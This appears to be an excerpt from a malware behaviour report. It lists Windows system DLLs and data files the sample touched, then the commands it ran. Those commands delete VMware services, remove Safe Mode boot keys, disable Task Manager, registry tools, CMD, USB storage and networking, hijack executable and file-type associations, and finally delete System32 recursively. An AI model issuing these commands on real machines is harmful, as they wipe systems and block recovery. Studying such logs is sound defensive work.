- %WINDIR%\syswow64\xapofx1_3.dll
- %WINDIR%\syswow64\xapofx1_2.dll
- %WINDIR%\syswow64\xapofx1_1.dll
- %WINDIR%\syswow64\xapofx1_0.dll
- %WINDIR%\syswow64\xactengine3_7.dll
- %WINDIR%\syswow64\xactengine3_6.dll
- %WINDIR%\syswow64\xactengine3_5.dll
- %WINDIR%\syswow64\xactengine3_4.dll
- %WINDIR%\syswow64\xactengine3_3.dll
- %WINDIR%\syswow64\xactengine3_2.dll
- %WINDIR%\syswow64\xactengine3_1.dll
- %WINDIR%\syswow64\mfc140rus.dll
- %WINDIR%\syswow64\xvidvfw.dll
- %WINDIR%\syswow64\vccorlib140d.dll
- %WINDIR%\syswow64\vccorlib140.dll
- %WINDIR%\syswow64\msvcp90d.dll
- %WINDIR%\syswow64\msvcp71.dll
- %WINDIR%\syswow64\msvcp70.dll
- %WINDIR%\syswow64\msvcp140d.dll
- %WINDIR%\syswow64\msvcp140.dll
- %WINDIR%\syswow64\msvcp120_clr0400.dll
- %WINDIR%\syswow64\msvcp120d.dll
- %WINDIR%\syswow64\msvcp120.dll
- %WINDIR%\syswow64\msvcp110_clr0400.dll
- %WINDIR%\syswow64\msvcp110d.dll
- %WINDIR%\syswow64\msvcp110.dll
- %WINDIR%\syswow64\msvcp100d.dll
- %WINDIR%\syswow64\msvcp100.dll
- %WINDIR%\syswow64\msvcm90d.dll
- %WINDIR%\syswow64\msclmd.dll
- %WINDIR%\syswow64\mfcm140u.dll
- %WINDIR%\syswow64\mfcm140.dll
- %WINDIR%\syswow64\mfcm120u.dll
- %WINDIR%\syswow64\mfcm120.dll
- %WINDIR%\syswow64\mfcm110u.dll
- %WINDIR%\syswow64\mfcm110.dll
- %WINDIR%\syswow64\mfcm100u.dll
- %WINDIR%\syswow64\mfcm100.dll
- %WINDIR%\syswow64\msvcr100.dll
- %WINDIR%\syswow64\msvcr100d.dll
- %WINDIR%\syswow64\msvcr100_clr0400.dll
- %WINDIR%\syswow64\msvcr110.dll
- %WINDIR%\syswow64\vccorlib120.dll
- %WINDIR%\syswow64\vccorlib110d.dll
- %WINDIR%\syswow64\vccorlib110.dll
- %WINDIR%\syswow64\vcamp140.dll
- %WINDIR%\syswow64\vcamp120.dll
- %WINDIR%\syswow64\vcamp110.dll
- %WINDIR%\syswow64\ucrtbased.dll
- %WINDIR%\syswow64\ticrf.rat
- %WINDIR%\syswow64\perfstringbackup.ini
- %WINDIR%\syswow64\noise.tha
- %WINDIR%\syswow64\noise.kor
- %WINDIR%\syswow64\mfc140kor.dll
- %WINDIR%\syswow64\noise.dat
- %WINDIR%\syswow64\noise.chs
- %WINDIR%\syswow64\msvcr90d.dll
- %WINDIR%\syswow64\msvcr71d.pdb
- %WINDIR%\syswow64\msvcr71.pdb
- %WINDIR%\syswow64\msvcr71.dll
- %WINDIR%\syswow64\msvcr70.dll
- %WINDIR%\syswow64\msvcr120_clr0400.dll
- %WINDIR%\syswow64\msvcr120d.dll
- %WINDIR%\syswow64\msvcr120.dll
- %WINDIR%\syswow64\msvcr110_clr0400.dll
- %WINDIR%\syswow64\msvcr110d.dll
- %WINDIR%\syswow64\vccorlib120d.dll
- %WINDIR%\syswow64\macromed\flash\activex.vch
- '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1
- '%WINDIR%\syswow64\sc.exe' delete VGAuthService
- '%WINDIR%\syswow64\cmd.exe' /c sc delete VGAuthService
- '%WINDIR%\syswow64\sc.exe' delete VMTools
- '%WINDIR%\syswow64\cmd.exe' /c sc delete VMTools
- '%WINDIR%\syswow64\sc.exe' delete vm3dservice
- '%WINDIR%\syswow64\cmd.exe' /c sc delete vm3dservice
- '%WINDIR%\syswow64\reg.exe' Add HKEY_LOCAL_MACHINE\SYSTEM\Select /v LastKnownGood /t REG_DWORD /d 00000001 /f
- '%WINDIR%\syswow64\cmd.exe' /c Reg Add HKEY_LOCAL_MACHINE\SYSTEM\Select /v LastKnownGood /t REG_DWORD /d 00000001 /f
- '%WINDIR%\syswow64\reg.exe' delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{36FC9E60-C465-11CF-8056-444553540000} /va /f
- '%WINDIR%\syswow64\cmd.exe' /c reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{36FC9E60-C465-11CF-8056-444553540000} /va /f
- '%WINDIR%\syswow64\reg.exe' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v disableregistrytools /t REG_DWORD /d 1
- '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v disableregistrytools /t REG_DWORD /d 1
- '%WINDIR%\syswow64\reg.exe' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
- '%WINDIR%\syswow64\cmd.exe' /c REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
- '%WINDIR%\syswow64\reg.exe' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v NoRun /t REG_DWORD /d 1
- '%WINDIR%\syswow64\reg.exe' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v NoRecentDocsMenu /t REG_DWORD /d 1
- '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v NoRun /t REG_DWORD /d 1
- '%WINDIR%\syswow64\cmd.exe' /c sc delete vmvss
- '%WINDIR%\syswow64\sc.exe' delete vmvss
- '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System /v DisableCMD /f
- '%WINDIR%\syswow64\cmd.exe' /c assoc .dat=pngfile
- '%WINDIR%\syswow64\cmd.exe' /c assoc .log=pngfile
- '%WINDIR%\syswow64\cmd.exe' /c assoc .mui=pngfile
- '%WINDIR%\syswow64\cmd.exe' /c assoc .dll=pngfile
- '%WINDIR%\syswow64\cmd.exe' /c assoc .ttf=pngfile
- '%WINDIR%\syswow64\cmd.exe' /c assoc .bin=pngfile
- '%WINDIR%\syswow64\cmd.exe' /c assoc .com=pngfile
- '%WINDIR%\syswow64\reg.exe' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v NoDesktop /t REG_DWORD /d 1
- '%WINDIR%\syswow64\cmd.exe' /c assoc .ini=pngfile
- '%WINDIR%\syswow64\cmd.exe' /c assoc .drv=pngfile
- '%WINDIR%\syswow64\cmd.exe' /c assoc .txt=pngfile
- '%WINDIR%\syswow64\cmd.exe' /c assoc .msl=pngfile
- '%WINDIR%\syswow64\cmd.exe' /c assoc .sys=pngfile
- '%WINDIR%\syswow64\sc.exe' delete LanmanWorkstation
- '%WINDIR%\syswow64\cmd.exe' /c sc delete LanmanWorkstation
- '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v NoRecentDocsMenu /t REG_DWORD /d 1
- '%WINDIR%\syswow64\reg.exe' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v NoFind /t REG_DWORD /d 1
- '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v NoFind /t REG_DWORD /d 1
- '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control /v DisabledHotkeys /t REG_DWORD /d 1
- '%WINDIR%\syswow64\reg.exe' delete HKEY_LOCAL_MACHINE\system\CurrentControlSet\Control\SafeBoot\NetWork /f
- '%WINDIR%\syswow64\cmd.exe' /c reg delete HKEY_LOCAL_MACHINE\system\CurrentControlSet\Control\SafeBoot\NetWork /f
- '%WINDIR%\syswow64\reg.exe' delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal \va /f
- '%WINDIR%\syswow64\cmd.exe' /c reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal \va /f
- '%WINDIR%\syswow64\netsh.exe' interface set interface Ethernet0 disable
- '%WINDIR%\syswow64\cmd.exe' /c netsh interface set interface Ethernet0 disable
- '%WINDIR%\syswow64\reg.exe' add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoCDBurning /t REG_DWORD /d 1
- '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoCDBurning /t REG_DWORD /d 1
- '%WINDIR%\syswow64\reg.exe' add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\usbstor /v Start /t reg_dword /d 4 /f
- '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\usbstor /v Start /t reg_dword /d 4 /f
- '%WINDIR%\syswow64\reg.exe' add HKEY_CURRENT_USER\Software\Policies\Microsoft\MMC\{8FC0B734 - A0E1 - 11D1 - A7D3 - 0000F87571E3} /v Restrict_Run /t REG_DWORD /d 1
- '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\MMC\{8FC0B734 - A0E1 - 11D1 - A7D3 - 0000F87571E3} /v Restrict_Run /t REG_DWORD /d 1
- '%WINDIR%\syswow64\reg.exe' add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1
- '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1
- '%WINDIR%\syswow64\reg.exe' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1
- '%WINDIR%\syswow64\reg.exe' add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control /v DisabledHotkeys /t REG_DWORD /d 1
- '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Classes\comfile\shell\open\command /v (Default) /t REG_DWORD /d 1
- '%WINDIR%\syswow64\reg.exe' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v NoFavoritesMenu /t REG_DWORD /d 1
- '%WINDIR%\syswow64\reg.exe' add HKEY_LOCAL_MACHINE\SOFTWARE\Classes\comfile\shell\open\command /v (Default) /t REG_DWORD /d 1
- '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v NoFavoritesMenu /t REG_DWORD /d 1
- '%WINDIR%\syswow64\reg.exe' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v NoClose /t REG_DWORD /d 1
- '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v NoClose /t REG_DWORD /d 1
- '%WINDIR%\syswow64\reg.exe' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v NoSMHelp /t REG_DWORD /d 1
- '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v NoSMHelp /t REG_DWORD /d 1
- '%WINDIR%\syswow64\reg.exe' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v NoSetFolders /t REG_DWORD /d 1
- '%WINDIR%\syswow64\cmd.exe' /c assoc .inf=pngfile
- '%WINDIR%\syswow64\reg.exe' add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System /v DisableCMD /f
- '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v NoDesktop /t REG_DWORD /d 1
- '%WINDIR%\syswow64\reg.exe' Add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v ReportBootOk /t REG_SZ /d 0 /f
- '%WINDIR%\syswow64\cmd.exe' /c reg Add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v ReportBootOk /t REG_SZ /d 0 /f
- '%WINDIR%\syswow64\reg.exe' add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_SZ /d 0 /f
- '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_SZ /d 0 /f
- '%WINDIR%\syswow64\reg.exe' add HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command /v (Default) /t REG_DWORD /d 1
- '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command /v (Default) /t REG_DWORD /d 1
- '%WINDIR%\syswow64\cmd.exe' /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v NoSetFolders /t REG_DWORD /d 1
- '%WINDIR%\syswow64\cmd.exe' /c del /s /q /f <SYSTEM32>